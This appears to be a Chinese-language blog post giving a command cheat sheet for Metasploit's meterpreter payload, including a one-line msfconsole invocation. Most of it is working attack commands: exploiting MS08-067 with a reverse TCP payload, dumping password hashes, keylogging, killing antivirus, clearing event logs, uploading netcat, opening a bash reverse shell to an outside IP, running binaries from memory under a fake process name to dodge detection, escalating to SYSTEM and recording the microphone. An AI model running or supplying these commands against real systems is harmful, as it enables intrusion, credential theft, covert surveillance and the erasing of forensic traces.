美文网首页
meterpreter基本命令、Msfcli

meterpreter基本命令、Msfcli

作者: Instu | 来源:发表于2017-04-10 16:31 被阅读0次

    meterpreter是更高级的payload。

    纯内存工作模式(不写硬盘),避免被电子取证;加密的通信协议,对传输过程进行加密;易于扩展。

    基本命令

    msf > use exploit/windows/smb/ms08_067_netapi

    msf exploit(ms08_067_netapi) > set rhost 192.168.80.148

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.80.163

    msf exploit(ms08_067_netapi) > exploit -j


    msf exploit(ms08_067_netapi) > sessions -i 1  进入meterpreter类型的shell

    meterpreter > background  退出到msf命令提示符下

    meterpreter > lpwd  等价于在kali上输入pwd

    meterpreter > lcd /etc  等价于在kali上输入cd /etc

    meterpreter > run post/windows/gather/smart_hashdump  获取目标主机上用户的hash值

    meterpreter > run post/windows/capture/keylog_recorder  键盘记录

    meterpreter > run killav  结束目标主机上的杀毒软件相关进程

    meterpreter > clearev  清除系统日志

    meterpreter > download boot.ini  下载目标主机上的boot.ini文件

    meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32  上传nc.exe到目标主机上。(注意要使用2个反斜杠)

    meterpreter > dir windows\\system32\\nc.exe

    meterpreter > execute -f nc -nvlp 3333  执行nc.exe

    meterpreter > execute -f "bash -i >& /dev/tcp/104.199.1.1/82 0>&1"

    meterpreter > execute -f bash -i -H

    meterpreter > execute -f cmd.exe -i -H  获得目标主机的shell,-i交互模式,-H隐藏

    meterpreter > execute -H -m -d calc.exe -f wce32.exe -a "-o foo.txt"

    meterpreter > cat foo.txt 

    -m 直接从内存中执行攻击端的可执行文件,不在硬盘存储,所以不会留下痕迹,且能避开杀毒软件的查杀;-d 设置需要显示的进程名,可以避开敏感人士的检查。

    meterpreter > getuid  查看当前用户

    meterpreter > getsystem  提权到system用户

    meterpreter > getprivs  查看当前用户具有的权限

    meterpreter > getpid  查看meterpreter注入到了什么进程中

    meterpreter > migrate 1436   更改到pid1436进程中

    meterpreter > getpid  重新使用getpid命令查看

    meterpreter > hashdump  获取目标主机上用户的hash值

    meterpreter > sysinfo  查看目标系统的信息

    meterpreter > kill 188  结束188进程

    meterpreter > shell  获取目标操作系统的shell

    meterpreter > idletime  查看目标主机已经空闲了多长时间

    meterpreter > edit C:\\Windows\\System32\\drivers\\etc\\hosts  编辑hosts文件

    meterpreter > record_mic -d 10 -f /root/桌面/1.mp4  监听麦克风

    meterpreter > load python  加载python插件

    Msfcli

    Msfcli编写脚本时便于引用,一条语句获得自己需要的操作。2015年6月已经取消,被msfconsole -x取代。

    msfconsole -x "use exploit/windows/smb/ms08_067_netapi;set RHOST 192.168.80.148;set PAYLOAD windows/meterpreter/reverse_tcp;set LHOST 192.168.80.163;exploit"

    相关文章

      网友评论

          本文标题:meterpreter基本命令、Msfcli

          本文链接:https://www.haomeiwen.com/subject/ztasattx.html